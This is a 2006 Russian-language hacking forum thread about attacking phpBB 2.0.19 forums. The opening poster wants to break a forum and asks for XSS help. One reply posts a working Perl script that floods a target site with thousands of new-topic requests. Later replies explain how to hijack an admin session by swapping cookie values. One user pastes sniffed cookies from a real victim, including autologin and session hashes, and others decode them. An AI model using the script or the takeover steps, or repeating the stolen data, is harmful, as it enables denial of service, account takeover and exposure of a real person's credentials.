Форумы phpbb 2.0.19 можно ли провести xss атаку на форумы таких версий

Discussion in 'Уязвимости CMS/форумов' started by Taylorith, 17 Oct 2006.

  1. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    Привет всем!
    ВОт такая проблема,хочу сломать форум но на нео нету ни одного эксплойта,начал изучать как составлять атаки xss,но не полностью понял о чем идет ресь,хочу чтобы вы мне поомгли в этом,скажите как для этих форумов можно составить xss атаку,я пробовал "><script>alert()</script> чтобы попробовать это я регистрируюсь на форуме вхожу в сосданную тему и отвечаю вот таким вот образом(выше),ничего не происходит,посомтрел фильтр имеет дырки или нет,пробовал '';!--"<exp>=&{()} вошел в соурс чтобы посмотреть как фильтр реагирует а там '';!--&quot;&lt;fuck&gt;=&amp;{()} вот что,я так понял дырок фильтр не имеет так как он заменил <> на другие символы,в статье HakNet (http://forum.antichat.ru/thread20140.html) как раз оттуда я все прочитал,все это написано для старых версий и на новые не проходит,я просто новичек в этом деле хочу чтобы вы немного профснили мне чсто дальше делать если фильтр фильтрует все это,что в этом случае предпринять?Если кто сможет привести пример xss атаки для форумов phpbb 2.0.19 я буду очень благодарен и как раз смогу понять в чем моя ошибка?Вернее что я должен был предпринять дальше,и впринципе все проясниться,даьше смогу сам составлять xss атаки.Спасибо заранее!!
    Тока пожалуйста не ругайтесь!!)) Спасибо!!
     
    #1 Taylorith, 17 Oct 2006
    Last edited: 17 Oct 2006
  2. oleg_2005

    oleg_2005 New Member

    Joined:
    30 Dec 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Кодируй XSS в hexe
     
  3. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    phpbb 2.0.18+ .. точно не знаю версию.

    стянул сессию. меняю в куках phpbb2mysql_sid (что-то подобное), потом перезагружаю страницу. в итоге просто выкидывает..

    подскажите в чем проблема может быть
     
  4. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Ьебята, здесь сплоит не давно выкладывали на форуме. Может попробуете :
    Code:
    #!/usr/bin/perl 
    
    print q{ 
    __________________________________________________  _______________________ 
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 
    
               /      \ 
            \  \  ,,  /  / 
             '-.`\()/`.-' 
            .--_'(  )'_--. 
           / /` /`""`\ `\ \           * SpiderZ ForumZ Security * 
            |  |  ><  |  | 
            \  \      /  / 
                '.__.'        
    
    
    => Exploit phpBB 2.0.19 ( by SpiderZ ) 
    => Topic infinitely exploit 
    => Sito: www.spiderz.tk 
    
    __________________________________________________  _______________________ 
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 
    
    }; 
    
    use IO::Socket; 
    
    ## Initialized X 
    $x = 0; 
    
    ## Exploit phpbb 2.0.19 SpiderZ 
    print q( 
    Exploit phpBB 2.0.19 ( by SpiderZ ) 
    
    ); 
    print q( 
    => Scrivi l'url del sito senza aggiungere http & www 
    => Url: ); 
    $host = <STDIN>; 
    chop ($host); 
    
    print q( 
    => Adesso indica in quale cartella e posto il phpbb 
    => di solito si trova su /phpBB2/ o /forum/ 
    => Cartella: ); 
    $pth = <STDIN>; 
    chop ($pth); 
    
    print q( 
    => Occhio usa un proxy prima di effettuare l'attacco 
    => il tuo ip verra spammato sul pannello admin del forum 
    => Per avviare l'exploit scrivi " hacking " 
    => ); 
    $type = <STDIN>; 
    chop ($type); 
    
    ## Search exploit phpbb by SpiderZ 
    if($type == 1){ 
    
    ## Search exploit phpbb by SpiderZ 
    while($x != 0000) 
    { 
    
    ## Search exploit phpbb by SpiderZ 
    $x++; 
    } 
    
    ## Nome attack Hacking 
    } 
    elsif ($type == hacking){ 
    
    ## Search exploit phpbb by SpiderZ 
    while($x != 10000) 
    { 
    ## Invia Search exploit phpbb by SpiderZ 
    $postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19"; 
    
    ## Posit Length 
    $lrg = length $postit; 
    
    ## Connect Socket with Variables Provided By User 
    my $sock = new IO::Socket::INET ( 
                                     PeerAddr => "$host", 
                                     PeerPort => "80", 
                                     Proto => "tcp", 
                                    ); 
    die "\nConnessione non riuscita: $!\n" unless $sock; 
    
    ## Invia Search exploit phpbb by SpiderZ 
    print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n"; 
    print $sock "Host: $host\n"; 
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
    print $sock "Referer: $host\n"; 
    print $sock "Accept-Language: en-us\n"; 
    print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
    print $sock "Content-Length: $lrg\n\n"; 
    print $sock "$postit\n"; 
    close($sock); 
    
    ## exploit phpbb by SpiderZ 
    syswrite STDOUT, "."; 
    
    ## exploit phpbb by SpiderZ 
    $x++; 
    } 
    }else{ 
    
    ## Error Exploit phpbb 
       die " 
    Error ! riprova... 
    \n"; 
    } 
     
  5. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    про sid забудь он не нужен, нужно заменять pass_hash и id.
     
  6. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Обясни, DOS-то тут причём. Вопрос был про XSS.
     
    2 people like this.
  7. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    то-есть средствами xss форум не сломать?
     
  8. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    n3r0bi0m4n, сломать возможно.. просто sid нужно удалять (это сессия)... а другие параметры менять.
     
  9. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    n3r0bi0m4n, стираешь из куков sid вообще напрочь, меняешь pass_hash на админовский, и id на админовский, перезаходишь и всё.
     
  10. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    вот то что наснифилось

    IP: 82.200.251.183
    QUERY: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"353cb7bc17a426dfe6670e0d95257dfa";s:6:"userid";i:2330;}; phpbb2mysql_lastid=2330; cpg133_data=YTozOntzOjI6IklEIjtzOjMyOiJlZWRlZmVkZTNlZjUwY2FmMDc1YmEyZjg0NDg0ZTdjYyI7czoyOiJhbSI7aToxO3M6MzoibGl2IjthOjI6e2k6MDtzOjM6IjM3NCI7aToxO3M6MzoiMzY1Ijt9fQ==; PHPSESSID=11a3cb062053fcd93dc542a9341a0ee3; b=b; hotlog=1; phpbb2mysql_sid=414adeefacfbf42030f6d3b78b1ba695
    REFERER: ***='<script src="***/script.js"></script>
    AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MRA 4.8 (build 01709); .NET CLR 1.1.4322)


    эм.. а де тут хэш? =)
     
  11. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    353cb7bc17a426dfe6670e0d95257dfa - hash
     
  12. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    ошибся...
     
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    эт чо???

    Там де Phpsessid эт те не надо!! убивай!
     
  14. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    В переводе с Base64 имеем:
    Code:
    cpg133_data=a:3:{s:2:\"ID\";s:32:\"eedefede3ef50caf075ba2f84484e7cc\";s:2:\"am\";i:1;s:3:\"liv\";a:2:{i:0;s:3:\"374\";i:1;s:3:\"365\";}}
    Отсюда, хэш eedefede3ef50caf075ba2f84484e7cc
     
    1 person likes this.
  15. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    thx. +.

    это md5 или mysql5 ? а то я в этом пока не сильно... :)
     
    1 person likes this.
  16. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Если с форума, то MD5.
     
Loading...